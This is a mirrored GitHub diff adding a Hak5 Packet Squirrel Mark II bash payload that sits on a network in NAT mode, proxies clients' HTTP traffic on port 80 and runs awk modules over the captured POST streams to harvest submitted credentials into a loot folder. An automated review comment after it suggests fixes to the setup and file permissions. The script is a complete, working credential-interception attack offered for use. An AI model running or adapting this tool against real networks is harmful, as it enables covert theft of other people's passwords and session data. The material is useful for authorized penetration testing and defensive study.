mirror of
https://github.com/hak5/packetsquirrel-payloads.git
synced 2025-12-19 09:48:47 +00:00
Capturing Credentials Submitted via HTTP
This payload uses *inotifywait* and *DYNAMICPROXY* to monitor the HTTP POST data streams generated by a client and extract sensitive information using *awk*.
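--- a/payloads/credentials/capturing-http-credentials/payload
+++ b/payloads/credentials/capturing-http-credentials/payload
@@ -0,0 +1,81 @@
+#!/bin/bash
+#
+# Title: Capturing Credentials Submitted via HTTP
+# Description:
+# This payload uses inotifywait and DYNAMICPROXY
+# to monitor the HTTP POST data streams generated
+# by a client and extract sensitive information using awk.
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Credentials
+# Prerequisites:
+# - Packet Squirrel Mark II
+#
+# Netmode: NAT
+#
+# STATUS
+# ================
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Waiting for a button press ...................... OFF
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## CONSTANTS ########
+
+PAYLOAD_SWITCH="/root/payloads/$(SWITCH)"
+readonly PAYLOAD_SWITCH
+
+readonly PAYLOAD_LOOTS="${PAYLOAD_SWITCH}/loots"
+readonly LOOTS_CREDENTIALS="${PAYLOAD_LOOTS}/credentials"
+readonly LOOTS_STREAMS="${PAYLOAD_LOOTS}/streams"
+readonly PAYLOAD_MODULES="${PAYLOAD_SWITCH}/modules"
+
+###########################
+
+set -u
+
+LED SETUP
+
+NETMODE NAT
+
+if [[ ! -d "${PAYLOAD_LOOTS}" ]]; then
+mkdir -p "${LOOTS_CREDENTIALS}" "${LOOTS_STREAMS}"
+fi
+
+LED ATTACK
+
+credentials_search() {
+inotifywait --monitor --format '%w%f' --event close_write "${LOOTS_STREAMS}" | while read -r dynamicproxy_stream; do
+if [[ -f "${dynamicproxy_stream}" ]]; then
+case "${dynamicproxy_stream}" in
+*_CLIENT.stream)
+for awk_module in "${PAYLOAD_MODULES}"/*.awk; do
+awk -f "${awk_module}" "${dynamicproxy_stream}"
+done
+;;
+esac
+rm "${dynamicproxy_stream}"
+fi
+done
+}
+credentials_search &> "${LOOTS_CREDENTIALS}/$(date +%s).log" &
+cs_pid="${!}"
+
+DYNAMICPROXY CLIENT "${LOOTS_STREAMS}/http_" 80 &
+dp_pid="${!}"
+
+LED OFF
+
+NO_LED=1 BUTTON
+
+LED CLEANUP
+
+kill "${dp_pid}" "${cs_pid}"
+sync
+
+LED FINISH
+
+poweroff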
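Review bot: The setup guard `if [[ ! -d "${PAYLOAD_LOOTS}" ]]` tests only the parent directory, so a `loots` directory that exists without `streams` or `credentials` skips the `mkdir`, and the later `inotifywait` watch and log redirection then point at a missing path. `mkdir -p` is already idempotent, so the guard can be dropped in favour of a bare `mkdir -p "${LOOTS_CREDENTIALS}" "${LOOTS_STREAMS}"`. Separately, the log under `${LOOTS_CREDENTIALS}` keeps whatever the awk modules print in cleartext with the default umask, and `&>` folds awk's stderr into the same file. A `umask 077` ahead of the `mkdir`, plus a header line such as `# Loot: plaintext secrets under loots/credentials`, would state the storage and handling requirement where the header currently lists only the device as a prerequisite. The `modules/*.awk` files the loop depends on are also not mentioned in the header.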